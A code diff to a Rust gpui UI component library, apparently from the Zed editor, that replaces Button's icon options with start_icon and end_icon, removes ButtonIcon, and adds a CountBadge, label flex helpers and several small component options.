+ .into_any_element(),
+ ),
];
Some(
@@ -8,16 +8,14 @@ use gpui::{AnyElement, IntoElement, ParentElement, Styled};
///
/// ```
/// use ui::prelude::*;
-/// use ui::{Banner, Button, IconName, IconPosition, IconSize, Label, Severity};
+/// use ui::{Banner, Button, Icon, IconName, IconSize, Label, Severity};
///
/// Banner::new()
/// .severity(Severity::Success)
/// .children([Label::new("This is a success message")])
/// .action_slot(
/// Button::new("learn-more", "Learn More")
-/// .icon(IconName::ArrowUpRight)
-/// .icon_size(IconSize::Small)
-/// .icon_position(IconPosition::End)
+/// .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)),
/// );
/// ```
#[derive(IntoElement, RegisterComponent)]
@@ -151,9 +149,7 @@ impl Component for Banner {
.child(Label::new("This is an informational message"))
.action_slot(
Button::new("learn-more", "Learn More")
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::End),
+ .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::Small)),
)
.into_any_element(),
),
@@ -1,5 +1,4 @@
mod button;
-mod button_icon;
mod button_like;
mod button_link;
mod copy_button;
@@ -2,15 +2,12 @@ use crate::component_prelude::*;
use gpui::{AnyElement, AnyView, DefiniteLength};
use ui_macros::RegisterComponent;
-use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, IconName, IconSize, Label};
+use crate::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle, Icon, Label};
use crate::{
- Color, DynamicSpacing, ElevationIndex, IconPosition, KeyBinding, KeybindingPosition, TintColor,
- prelude::*,
+ Color, DynamicSpacing, ElevationIndex, KeyBinding, KeybindingPosition, TintColor, prelude::*,
};
-use super::button_icon::ButtonIcon;
-
-/// An element that creates a button with a label and an optional icon.
+/// An element that creates a button with a label and optional icons.
///
/// Common buttons:
/// - Label, Icon + Label: [`Button`] (this component)
@@ -42,7 +39,7 @@ use super::button_icon::ButtonIcon;
/// use ui::prelude::*;
///
/// Button::new("button_id", "Click me!")
-/// .icon(IconName::Check)
+/// .start_icon(Icon::new(IconName::Check))
/// .toggle_state(true)
/// .on_click(|event, window, cx| {
/// // Handle click event
@@ -85,12 +82,8 @@ pub struct Button {
label_size: Option<LabelSize>,
selected_label: Option<SharedString>,
selected_label_color: Option<Color>,
- icon: Option<IconName>,
- icon_position: Option<IconPosition>,
- icon_size: Option<IconSize>,
- icon_color: Option<Color>,
- selected_icon: Option<IconName>,
- selected_icon_color: Option<Color>,
+ start_icon: Option<Icon>,
+ end_icon: Option<Icon>,
key_binding: Option<KeyBinding>,
key_binding_position: KeybindingPosition,
alpha: Option<f32>,
@@ -112,12 +105,8 @@ impl Button {
label_size: None,
selected_label: None,
selected_label_color: None,
- icon: None,
- icon_position: None,
- icon_size: None,
- icon_color: None,
- selected_icon: None,
- selected_icon_color: None,
+ start_icon: None,
+ end_icon: None,
key_binding: None,
key_binding_position: KeybindingPosition::default(),
alpha: None,
@@ -149,39 +138,19 @@ impl Button {
self
}
- /// Assigns an icon to the button.
- pub fn icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.icon = icon.into();
- self
- }
-
- /// Sets the position of the icon relative to the label.
- pub fn icon_position(mut self, icon_position: impl Into<Option<IconPosition>>) -> Self {
- self.icon_position = icon_position.into();
- self
- }
-
- /// Specifies the size of the button's icon.
- pub fn icon_size(mut self, icon_size: impl Into<Option<IconSize>>) -> Self {
- self.icon_size = icon_size.into();
- self
- }
-
- /// Sets the color of the button's icon.
- pub fn icon_color(mut self, icon_color: impl Into<Option<Color>>) -> Self {
- self.icon_color = icon_color.into();
- self
- }
-
- /// Chooses an icon to display when the button is in a selected state.
- pub fn selected_icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.selected_icon = icon.into();
+ /// Sets an icon to display at the start (left) of the button label.
+ ///
+ /// The icon's color will be overridden to `Color::Disabled` when the button is disabled.
+ pub fn start_icon(mut self, icon: impl Into<Option<Icon>>) -> Self {
+ self.start_icon = icon.into();
self
}
- /// Sets the icon color used when the button is in a selected state.
- pub fn selected_icon_color(mut self, color: impl Into<Option<Color>>) -> Self {
- self.selected_icon_color = color.into();
+ /// Sets an icon to display at the end (right) of the button label.
+ ///
+ /// The icon's color will be overridden to `Color::Disabled` when the button is disabled.
+ pub fn end_icon(mut self, icon: impl Into<Option<Icon>>) -> Self {
+ self.end_icon = icon.into();
self
}
@@ -219,22 +188,24 @@ impl Button {
impl Toggleable for Button {
/// Sets the selected state of the button.
///
- /// This method allows the selection state of the button to be specified.
- /// It modifies the button's appearance to reflect its selected state.
- ///
/// # Examples
///
+ /// Create a toggleable button that changes appearance when selected:
+ ///
/// ```
/// use ui::prelude::*;
+ /// use ui::TintColor;
///
- /// Button::new("button_id", "Click me!")
- /// .toggle_state(true)
+ /// let selected = true;
+ ///
+ /// Button::new("toggle_button", "Toggle Me")
+ /// .start_icon(Icon::new(IconName::Check))
+ /// .toggle_state(selected)
+ /// .selected_style(ButtonStyle::Tinted(TintColor::Accent))
/// .on_click(|event, window, cx| {
- /// // Handle click event
+ /// // Toggle the selected state
/// });
/// ```
- ///
- /// Use [`selected_style`](Button::selected_style) to change the style of the button when it is selected.
fn toggle_state(mut self, selected: bool) -> Self {
self.base = self.base.toggle_state(selected);
self
@@ -242,22 +213,20 @@ impl Toggleable for Button {
}
impl SelectableButton for Button {
- /// Sets the style for the button when selected.
+ /// Sets the style for the button in a selected state.
///
/// # Examples
///
+ /// Customize the selected appearance of a button:
+ ///
/// ```
/// use ui::prelude::*;
/// use ui::TintColor;
///
- /// Button::new("button_id", "Click me!")
+ /// Button::new("styled_button", "Styled Button")
/// .toggle_state(true)
- /// .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// .selected_style(ButtonStyle::Tinted(TintColor::Accent));
/// ```
- /// This results in a button with a blue tinted background when selected.
fn selected_style(mut self, style: ButtonStyle) -> Self {
self.base = self.base.selected_style(style);
self
@@ -265,36 +234,27 @@ impl SelectableButton for Button {
}
impl Disableable for Button {
- /// Disables the button.
+ /// Disables the button, preventing interaction and changing its appearance.
///
- /// This method allows the button to be disabled. When a button is disabled,
- /// it doesn't react to user interactions and its appearance is updated to reflect this.
+ /// When disabled, the button's icon and label will use `Color::Disabled`.
///
/// # Examples
///
+ /// Create a disabled button:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .disabled(true)
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("disabled_button", "Can't Click Me")
+ /// .disabled(true);
/// ```
- ///
- /// This results in a button that is disabled and does not respond to click events.
fn disabled(mut self, disabled: bool) -> Self {
self.base = self.base.disabled(disabled);
- self.key_binding = self
- .key_binding
- .take()
- .map(|binding| binding.disabled(disabled));
self
}
}
impl Clickable for Button {
- /// Sets the click event handler for the button.
fn on_click(
mut self,
handler: impl Fn(&gpui::ClickEvent, &mut Window, &mut App) + 'static,
@@ -310,44 +270,35 @@ impl Clickable for Button {
}
impl FixedWidth for Button {
- /// Sets a fixed width for the button.
- ///
- /// This function allows a button to have a fixed width instead of automatically growing or shrinking.
/// Sets a fixed width for the button.
///
/// # Examples
///
+ /// Create a button with a fixed width of 100 pixels:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .width(px(100.))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("fixed_width_button", "Fixed Width")
+ /// .width(px(100.0));
/// ```
- ///
- /// This sets the button's width to be exactly 100 pixels.
fn width(mut self, width: impl Into<DefiniteLength>) -> Self {
self.base = self.base.width(width);
self
}
- /// Sets the button to occupy the full width of its container.
+ /// Makes the button take up the full width of its container.
///
/// # Examples
///
+ /// Create a button that takes up the full width of its container:
+ ///
/// ```
/// use ui::prelude::*;
///
- /// Button::new("button_id", "Click me!")
- /// .full_width()
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
+ /// Button::new("full_width_button", "Full Width")
+ /// .full_width();
/// ```
- ///
- /// This stretches the button to the full width of its container.
fn full_width(mut self) -> Self {
self.base = self.base.full_width();
self
@@ -355,43 +306,34 @@ impl FixedWidth for Button {
}
impl ButtonCommon for Button {
- /// Sets the button's id.
fn id(&self) -> &ElementId {
self.base.id()
}
- /// Sets the visual style of the button using a [`ButtonStyle`].
+ /// Sets the visual style of the button.
fn style(mut self, style: ButtonStyle) -> Self {
self.base = self.base.style(style);
self
}
- /// Sets the button's size using a [`ButtonSize`].
+ /// Sets the size of the button.
fn size(mut self, size: ButtonSize) -> Self {
self.base = self.base.size(size);
self
}
- /// Sets a tooltip for the button.
- ///
- /// This method allows a tooltip to be set for the button. The tooltip is a function that
- /// takes a mutable references to [`Window`] and [`App`], and returns an [`AnyView`]. The
- /// tooltip is displayed when the user hovers over the button.
+ /// Sets a tooltip that appears on hover.
///
/// # Examples
///
- /// ```
- /// use ui::prelude::*;
- /// use ui::Tooltip;
+ /// Add a tooltip to a button:
///
- /// Button::new("button_id", "Click me!")
- /// .tooltip(Tooltip::text("This is a tooltip"))
- /// .on_click(|event, window, cx| {
- /// // Handle click event
- /// });
/// ```
+ /// use ui::{Tooltip, prelude::*};
///
- /// This will create a button with a tooltip that displays "This is a tooltip" when hovered over.
+ /// Button::new("tooltip_button", "Hover Me")
+ /// .tooltip(Tooltip::text("This is a tooltip"));
+ /// ```
fn tooltip(mut self, tooltip: impl Fn(&mut Window, &mut App) -> AnyView + 'static) -> Self {
self.base = self.base.tooltip(tooltip);
self
@@ -436,16 +378,12 @@ impl RenderOnce for Button {
h_flex()
.when(self.truncate, |this| this.min_w_0().overflow_hidden())
.gap(DynamicSpacing::Base04.rems(cx))
- .when(self.icon_position == Some(IconPosition::Start), |this| {
- this.children(self.icon.map(|icon| {
- ButtonIcon::new(icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .size(self.icon_size)
- .color(self.icon_color)
- }))
+ .when_some(self.start_icon, |this, icon| {
+ this.child(if is_disabled {
+ icon.color(Color::Disabled)
+ } else {
+ icon
+ })
})
.child(
h_flex()
@@ -465,16 +403,12 @@ impl RenderOnce for Button {
)
.children(self.key_binding),
)
- .when(self.icon_position != Some(IconPosition::Start), |this| {
- this.children(self.icon.map(|icon| {
- ButtonIcon::new(icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .size(self.icon_size)
- .color(self.icon_color)
- }))
+ .when_some(self.end_icon, |this, icon| {
+ this.child(if is_disabled {
+ icon.color(Color::Disabled)
+ } else {
+ icon
+ })
}),
)
}
@@ -585,24 +519,28 @@ impl Component for Button {
"Buttons with Icons",
vec![
single_example(
- "Icon Start",
- Button::new("icon_start", "Icon Start")
- .icon(IconName::Check)
- .icon_position(IconPosition::Start)
+ "Start Icon",
+ Button::new("icon_start", "Start Icon")
+ .start_icon(Icon::new(IconName::Check))
+ .into_any_element(),
+ ),
+ single_example(
+ "End Icon",
+ Button::new("icon_end", "End Icon")
+ .end_icon(Icon::new(IconName::Check))
.into_any_element(),
),
single_example(
- "Icon End",
- Button::new("icon_end", "Icon End")
- .icon(IconName::Check)
- .icon_position(IconPosition::End)
+ "Both Icons",
+ Button::new("both_icons", "Both Icons")
+ .start_icon(Icon::new(IconName::Check))
+ .end_icon(Icon::new(IconName::ChevronDown))
.into_any_element(),
),
single_example(
"Icon Color",
Button::new("icon_color", "Icon Color")
- .icon(IconName::Check)
- .icon_color(Color::Accent)
+ .start_icon(Icon::new(IconName::Check).color(Color::Accent))
.into_any_element(),
),
],
@@ -1,199 +0,0 @@
-use crate::{Icon, IconName, IconSize, IconWithIndicator, Indicator, prelude::*};
-use gpui::Hsla;
-
-/// An icon that appears within a button.
-///
-/// Can be used as either an icon alongside a label, like in [`Button`](crate::Button),
-/// or as a standalone icon, like in [`IconButton`](crate::IconButton).
-#[derive(IntoElement, RegisterComponent)]
-pub(super) struct ButtonIcon {
- icon: IconName,
- size: IconSize,
- color: Color,
- disabled: bool,
- selected: bool,
- selected_icon: Option<IconName>,
- selected_icon_color: Option<Color>,
- selected_style: Option<ButtonStyle>,
- indicator: Option<Indicator>,
- indicator_border_color: Option<Hsla>,
-}
-
-impl ButtonIcon {
- pub fn new(icon: IconName) -> Self {
- Self {
- icon,
- size: IconSize::default(),
- color: Color::default(),
- disabled: false,
- selected: false,
- selected_icon: None,
- selected_icon_color: None,
- selected_style: None,
- indicator: None,
- indicator_border_color: None,
- }
- }
-
- pub fn size(mut self, size: impl Into<Option<IconSize>>) -> Self {
- if let Some(size) = size.into() {
- self.size = size;
- }
- self
- }
-
- pub fn color(mut self, color: impl Into<Option<Color>>) -> Self {
- if let Some(color) = color.into() {
- self.color = color;
- }
- self
- }
-
- pub fn selected_icon(mut self, icon: impl Into<Option<IconName>>) -> Self {
- self.selected_icon = icon.into();
- self
- }
-
- pub fn selected_icon_color(mut self, color: impl Into<Option<Color>>) -> Self {
- self.selected_icon_color = color.into();
- self
- }
-
- pub fn indicator(mut self, indicator: Indicator) -> Self {
- self.indicator = Some(indicator);
- self
- }
-
- pub fn indicator_border_color(mut self, color: Option<Hsla>) -> Self {
- self.indicator_border_color = color;
- self
- }
-}
-
-impl Disableable for ButtonIcon {
- fn disabled(mut self, disabled: bool) -> Self {
- self.disabled = disabled;
- self
- }
-}
-
-impl Toggleable for ButtonIcon {
- fn toggle_state(mut self, selected: bool) -> Self {
- self.selected = selected;
- self
- }
-}
-
-impl SelectableButton for ButtonIcon {
- fn selected_style(mut self, style: ButtonStyle) -> Self {
- self.selected_style = Some(style);
- self
- }
-}
-
-impl RenderOnce for ButtonIcon {
- fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement {
- let icon = self
- .selected_icon
- .filter(|_| self.selected)
- .unwrap_or(self.icon);
-
- let icon_color = if self.disabled {
- Color::Disabled
- } else if self.selected_style.is_some() && self.selected {
- self.selected_style.unwrap().into()
- } else if self.selected {
- self.selected_icon_color.unwrap_or(Color::Selected)
- } else {
- self.color
- };
-
- let icon = Icon::new(icon).size(self.size).color(icon_color);
-
- match self.indicator {
- Some(indicator) => IconWithIndicator::new(icon, Some(indicator))
- .indicator_border_color(self.indicator_border_color)
- .into_any_element(),
- None => icon.into_any_element(),
- }
- }
-}
-
-impl Component for ButtonIcon {
- fn scope() -> ComponentScope {
- ComponentScope::Input
- }
-
- fn name() -> &'static str {
- "ButtonIcon"
- }
-
- fn description() -> Option<&'static str> {
- Some("An icon component specifically designed for use within buttons.")
- }
-
- fn preview(_window: &mut Window, _cx: &mut App) -> Option<AnyElement> {
- Some(
- v_flex()
- .gap_6()
- .children(vec![
- example_group_with_title(
- "Basic Usage",
- vec![
- single_example(
- "Default",
- ButtonIcon::new(IconName::Star).into_any_element(),
- ),
- single_example(
- "Custom Size",
- ButtonIcon::new(IconName::Star)
- .size(IconSize::Medium)
- .into_any_element(),
- ),
- single_example(
- "Custom Color",
- ButtonIcon::new(IconName::Star)
- .color(Color::Accent)
- .into_any_element(),
- ),
- ],
- ),
- example_group_with_title(
- "States",
- vec![
- single_example(
- "Selected",
- ButtonIcon::new(IconName::Star)
- .toggle_state(true)
- .into_any_element(),
- ),
- single_example(
- "Disabled",
- ButtonIcon::new(IconName::Star)
- .disabled(true)
- .into_any_element(),
- ),
- ],
- ),
- example_group_with_title(
- "With Indicator",
- vec![
- single_example(
- "Default Indicator",
- ButtonIcon::new(IconName::Star)
- .indicator(Indicator::dot())
- .into_any_element(),
- ),
- single_example(
- "Custom Indicator",
- ButtonIcon::new(IconName::Star)
- .indicator(Indicator::dot().color(Color::Error))
- .into_any_element(),
- ),
- ],
- ),
- ])
- .into_any_element(),
- )
- }
-}
@@ -1,11 +1,11 @@
use gpui::{AnyView, DefiniteLength, Hsla};
use super::button_like::{ButtonCommon, ButtonLike, ButtonSize, ButtonStyle};
-use crate::{ElevationIndex, Indicator, SelectableButton, TintColor, prelude::*};
+use crate::{
+ ElevationIndex, Icon, IconWithIndicator, Indicator, SelectableButton, TintColor, prelude::*,
+};
use crate::{IconName, IconSize};
-use super::button_icon::ButtonIcon;
-
/// The shape of an [`IconButton`].
#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy)]
pub enum IconButtonShape {
@@ -22,6 +22,7 @@ pub struct IconButton {
icon_color: Color,
selected_icon: Option<IconName>,
selected_icon_color: Option<Color>,
+ selected_style: Option<ButtonStyle>,
indicator: Option<Indicator>,
indicator_border_color: Option<Hsla>,
alpha: Option<f32>,
@@ -37,6 +38,7 @@ impl IconButton {
icon_color: Color::Default,
selected_icon: None,
selected_icon_color: None,
+ selected_style: None,
indicator: None,
indicator_border_color: None,
alpha: None,
@@ -112,6 +114,7 @@ impl Toggleable for IconButton {
impl SelectableButton for IconButton {
fn selected_style(mut self, style: ButtonStyle) -> Self {
+ self.selected_style = Some(style);
self.base = self.base.selected_style(style);
self
}
@@ -192,9 +195,25 @@ impl RenderOnce for IconButton {
fn render(self, window: &mut Window, cx: &mut App) -> ButtonLike {
let is_disabled = self.base.disabled;
let is_selected = self.base.selected;
- let selected_style = self.base.selected_style;
- let color = self.icon_color.color(cx).opacity(self.alpha.unwrap_or(1.0));
+ let icon = self
+ .selected_icon
+ .filter(|_| is_selected)
+ .unwrap_or(self.icon);
+
+ let icon_color = if is_disabled {
+ Color::Disabled
+ } else if self.selected_style.is_some() && is_selected {
+ self.selected_style.unwrap().into()
+ } else if is_selected {
+ self.selected_icon_color.unwrap_or(Color::Selected)
+ } else {
+ let base_color = self.icon_color.color(cx);
+ Color::Custom(base_color.opacity(self.alpha.unwrap_or(1.0)))
+ };
+
+ let icon_element = Icon::new(icon).size(self.icon_size).color(icon_color);
+
self.base
.map(|this| match self.shape {
IconButtonShape::Square => {
@@ -203,20 +222,12 @@ impl RenderOnce for IconButton {
}
IconButtonShape::Wide => this,
})
- .child(
- ButtonIcon::new(self.icon)
- .disabled(is_disabled)
- .toggle_state(is_selected)
- .selected_icon(self.selected_icon)
- .selected_icon_color(self.selected_icon_color)
- .when_some(selected_style, |this, style| this.selected_style(style))
- .when_some(self.indicator, |this, indicator| {
- this.indicator(indicator)
- .indicator_border_color(self.indicator_border_color)
- })
- .size(self.icon_size)
- .color(Color::Custom(color)),
- )
+ .child(match self.indicator {
+ Some(indicator) => IconWithIndicator::new(icon_element, Some(indicator))
+ .indicator_border_color(self.indicator_border_color)
+ .into_any_element(),
+ None => icon_element.into_any_element(),
+ })
}
}
@@ -81,8 +81,7 @@ impl RenderOnce for Chip {
h_flex()
.when_some(self.height, |this, h| this.h(h))
- .min_w_0()
- .flex_initial()
+ .flex_none()
.px_1()
.border_1()
.rounded_sm()
@@ -692,10 +692,20 @@ impl ContextMenu {
}
pub fn action_checked(
+ self,
+ label: impl Into<SharedString>,
+ action: Box<dyn Action>,
+ checked: bool,
+ ) -> Self {
+ self.action_checked_with_disabled(label, action, checked, false)
+ }
+
+ pub fn action_checked_with_disabled(
mut self,
label: impl Into<SharedString>,
action: Box<dyn Action>,
checked: bool,
+ disabled: bool,
) -> Self {
self.items.push(ContextMenuItem::Entry(ContextMenuEntry {
toggle: if checked {
@@ -718,7 +728,7 @@ impl ContextMenu {
icon_position: IconPosition::End,
icon_size: IconSize::Small,
icon_color: None,
- disabled: false,
+ disabled,
documentation_aside: None,
end_slot_icon: None,
end_slot_title: None,
@@ -0,0 +1,93 @@
+use gpui::FontWeight;
+
+use crate::prelude::*;
+
+/// A small, pill-shaped badge that displays a numeric count.
+///
+/// The count is capped at 99 and displayed as "99+" beyond that.
+#[derive(IntoElement, RegisterComponent)]
+pub struct CountBadge {
+ count: usize,
+}
+
+impl CountBadge {
+ pub fn new(count: usize) -> Self {
+ Self { count }
+ }
+}
+
+impl RenderOnce for CountBadge {
+ fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
+ let label = if self.count > 99 {
+ "99+".to_string()
+ } else {
+ self.count.to_string()
+ };
+
+ let bg = cx
+ .theme()
+ .colors()
+ .editor_background
+ .blend(cx.theme().status().error.opacity(0.4));
+
+ h_flex()
+ .absolute()
+ .top_0()
+ .right_0()
+ .p_px()
+ .h_3p5()
+ .min_w_3p5()
+ .rounded_full()
+ .justify_center()
+ .text_center()
+ .border_1()
+ .border_color(cx.theme().colors().border)
+ .bg(bg)
+ .shadow_sm()
+ .child(
+ Label::new(label)
+ .size(LabelSize::Custom(rems_from_px(9.)))
+ .weight(FontWeight::MEDIUM),
+ )
+ }
+}
+
+impl Component for CountBadge {
+ fn scope() -> ComponentScope {
+ ComponentScope::Status
+ }
+
+ fn description() -> Option<&'static str> {
+ Some("A small, pill-shaped badge that displays a numeric count.")
+ }
+
+ fn preview(_window: &mut Window, cx: &mut App) -> Option<AnyElement> {
+ let container = || {
+ div()
+ .relative()
+ .size_8()
+ .border_1()
+ .border_color(cx.theme().colors().border)
+ .bg(cx.theme().colors().background)
+ };
+
+ Some(
+ v_flex()
+ .gap_6()
+ .child(example_group_with_title(
+ "Count Badge",
+ vec![
+ single_example(
+ "Basic Count",
+ container().child(CountBadge::new(3)).into_any_element(),
+ ),
+ single_example(
+ "Capped Count",
+ container().child(CountBadge::new(150)).into_any_element(),
+ ),
+ ],
+ ))
+ .into_any_element(),
+ )
+ }
+}
@@ -1,3 +1,4 @@
+use crate::Tooltip;
use crate::prelude::*;
#[derive(IntoElement, RegisterComponent)]
@@ -6,6 +7,7 @@ pub struct DiffStat {
added: usize,
removed: usize,
label_size: LabelSize,
+ tooltip: Option<SharedString>,
}
impl DiffStat {
@@ -15,6 +17,7 @@ impl DiffStat {
added,
removed,
label_size: LabelSize::Small,
+ tooltip: None,
}
}
@@ -22,41 +25,32 @@ impl DiffStat {
self.label_size = label_size;
self
}
+
+ pub fn tooltip(mut self, tooltip: impl Into<SharedString>) -> Self {
+ self.tooltip = Some(tooltip.into());
+ self
+ }
}
impl RenderOnce for DiffStat {
fn render(self, _: &mut Window, _cx: &mut App) -> impl IntoElement {
+ let tooltip = self.tooltip;
h_flex()
.id(self.id)
.gap_1()
.child(
- h_flex()
- .gap_0p5()
- .child(
- Icon::new(IconName::Plus)
- .size(IconSize::XSmall)
- .color(Color::Success),
- )
- .child(
- Label::new(self.added.to_string())
- .color(Color::Success)
- .size(self.label_size),
- ),
+ Label::new(format!("+\u{2009}{}", self.added))
+ .color(Color::Success)
+ .size(self.label_size),
)
.child(
- h_flex()
- .gap_0p5()
- .child(
- Icon::new(IconName::Dash)
- .size(IconSize::XSmall)
- .color(Color::Error),
- )
- .child(
- Label::new(self.removed.to_string())
- .color(Color::Error)
- .size(self.label_size),
- ),
+ Label::new(format!("\u{2012}\u{2009}{}", self.removed))
+ .color(Color::Error)
+ .size(self.label_size),
)
+ .when_some(tooltip, |this, tooltip| {
+ this.tooltip(Tooltip::text(tooltip))
+ })
}
}
@@ -163,11 +163,10 @@ impl RenderOnce for DropdownMenu {
Some(
Button::new(self.id.clone(), text)
.style(button_style)
- .when(self.chevron, |this| {
- this.icon(self.trigger_icon)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .when_some(self.trigger_icon.filter(|_| self.chevron), |this, icon| {
+ this.end_icon(
+ Icon::new(icon).size(IconSize::XSmall).color(Color::Muted),
+ )
})
.when(full_width, |this| this.full_width())
.size(trigger_size)
@@ -1,6 +1,6 @@
use std::ops::Range;
-use gpui::{FontWeight, HighlightStyle, StyledText};
+use gpui::{FontWeight, HighlightStyle, StyleRefinement, StyledText};
use crate::{LabelCommon, LabelLike, LabelSize, LineHeightStyle, prelude::*};
@@ -38,6 +38,40 @@ impl HighlightedLabel {
}
}
+impl HighlightedLabel {
+ fn style(&mut self) -> &mut StyleRefinement {
+ self.base.base.style()
+ }
+
+ pub fn flex_1(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self.style().flex_shrink = Some(1.);
+ self.style().flex_basis = Some(gpui::relative(0.).into());
+ self
+ }
+
+ pub fn flex_none(mut self) -> Self {
+ self.style().flex_grow = Some(0.);
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+
+ pub fn flex_grow(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink(mut self) -> Self {
+ self.style().flex_shrink = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink_0(mut self) -> Self {
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+}
+
impl LabelCommon for HighlightedLabel {
fn size(mut self, size: LabelSize) -> Self {
self.base = self.base.size(size);
@@ -73,6 +73,34 @@ impl Label {
gpui::margin_style_methods!({
visibility: pub
});
+
+ pub fn flex_1(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self.style().flex_shrink = Some(1.);
+ self.style().flex_basis = Some(gpui::relative(0.).into());
+ self
+ }
+
+ pub fn flex_none(mut self) -> Self {
+ self.style().flex_grow = Some(0.);
+ self.style().flex_shrink = Some(0.);
+ self
+ }
+
+ pub fn flex_grow(mut self) -> Self {
+ self.style().flex_grow = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink(mut self) -> Self {
+ self.style().flex_shrink = Some(1.);
+ self
+ }
+
+ pub fn flex_shrink_0(mut self) -> Self {
+ self.style().flex_shrink = Some(0.);
+ self
+ }
}
impl LabelCommon for Label {
@@ -4,7 +4,7 @@ use component::{Component, ComponentScope, example_group_with_title, single_exam
use gpui::{AnyElement, AnyView, ClickEvent, MouseButton, MouseDownEvent, Pixels, px};
use smallvec::SmallVec;
-use crate::{Disclosure, GradientFade, prelude::*};
+use crate::{Disclosure, prelude::*};
#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy, Default)]
pub enum ListItemSpacing {
@@ -45,6 +45,8 @@ pub struct ListItem {
rounded: bool,
overflow_x: bool,
focused: Option<bool>,
+ docked_right: bool,
+ height: Option<Pixels>,
}
impl ListItem {
@@ -74,6 +76,8 @@ impl ListItem {
rounded: false,
overflow_x: false,
focused: None,
+ docked_right: false,
+ height: None,
}
}
@@ -185,6 +189,16 @@ impl ListItem {
self.focused = Some(focused);
self
}
+
+ pub fn docked_right(mut self, docked_right: bool) -> Self {
+ self.docked_right = docked_right;
+ self
+ }
+
+ pub fn height(mut self, height: Pixels) -> Self {
+ self.height = Some(height);
+ self
+ }
}
impl Disableable for ListItem {
@@ -209,25 +223,11 @@ impl ParentElement for ListItem {
impl RenderOnce for ListItem {
fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement {
- let color = cx.theme().colors();
-
- let base_bg = if self.selected {
- color.element_active
- } else {
- color.panel_background
- };
-
- let end_hover_gradient_overlay =
- GradientFade::new(base_bg, color.element_hover, color.element_active)
- .width(px(96.0))
- .when_some(self.group_name.clone(), |fade, group| {
- fade.group_name(group)
- });
-
h_flex()
.id(self.id)
.when_some(self.group_name, |this, group| this.group(group))
.w_full()
+ .when_some(self.height, |this, height| this.h(height))
.relative()
// When an item is inset draw the indent spacing outside of the item
.when(self.inset, |this| {
@@ -238,6 +238,7 @@ impl RenderOnce for ListItem {
this.when_some(self.focused, |this, focused| {
if focused {
this.border_1()
+ .when(self.docked_right, |this| this.border_r_2())
.border_color(cx.theme().colors().border_focused)
} else {
this.border_1()
@@ -268,26 +269,21 @@ impl RenderOnce for ListItem {
ListItemSpacing::Sparse => this.py_1(),
})
.when(self.inset && !self.disabled, |this| {
- this
- // TODO: Add focus state
- //.when(self.state == InteractionState::Focused, |this| {
- .when_some(self.focused, |this, focused| {
- if focused {
- this.border_1()
- .border_color(cx.theme().colors().border_focused)
- } else {
- this.border_1()
- }
- })
- .when(self.selectable, |this| {
- this.hover(|style| {
- style.bg(cx.theme().colors().ghost_element_hover)
- })
+ this.when_some(self.focused, |this, focused| {
+ if focused {
+ this.border_1()
+ .border_color(cx.theme().colors().border_focused)
+ } else {
+ this.border_1()
+ }
+ })
+ .when(self.selectable, |this| {
+ this.hover(|style| style.bg(cx.theme().colors().ghost_element_hover))
.active(|style| style.bg(cx.theme().colors().ghost_element_active))
.when(self.selected, |this| {
this.bg(cx.theme().colors().ghost_element_selected)
})
- })
+ })
})
.when_some(
self.on_click.filter(|_| !self.disabled),
@@ -362,7 +358,6 @@ impl RenderOnce for ListItem {
.right(DynamicSpacing::Base06.rems(cx))
.top_0()
.visible_on_hover("list_item")
- .child(end_hover_gradient_overlay)
.child(end_hover_slot),
)
}),
@@ -162,7 +162,7 @@ impl RenderOnce for ModalHeader {
children.insert(
0,
Headline::new(headline)
- .size(HeadlineSize::XSmall)
+ .size(HeadlineSize::Small)
.color(Color::Muted)
.into_any_element(),
);
@@ -23,3 +23,14 @@ pub use with_rem_size::*;
pub fn is_light(cx: &mut App) -> bool {
cx.theme().appearance.is_light()
}
+
+/// Returns the platform-appropriate label for the "reveal in file manager" action.
+pub fn reveal_in_file_manager_label(is_remote: bool) -> &'static str {
+ if cfg!(target_os = "macos") && !is_remote {
+ "Reveal in Finder"
+ } else if cfg!(target_os = "windows") && !is_remote {
+ "Reveal in File Explorer"
+ } else {
+ "Reveal in File Manager"
+ }
+}
@@ -3,6 +3,7 @@ use component::{example_group, single_example};
use gpui::{App, FocusHandle, Focusable, Hsla, Length};
use std::sync::Arc;
+use ui::Tooltip;
use ui::prelude::*;
use crate::ErasedEditor;
@@ -38,6 +39,8 @@ pub struct InputField {
tab_index: Option<isize>,
/// Whether this field is a tab stop (can be focused via Tab key).
tab_stop: bool,
+ /// Whether the field content is masked (for sensitive fields like passwords or API keys).
+ masked: Option<bool>,
}
impl Focusable for InputField {
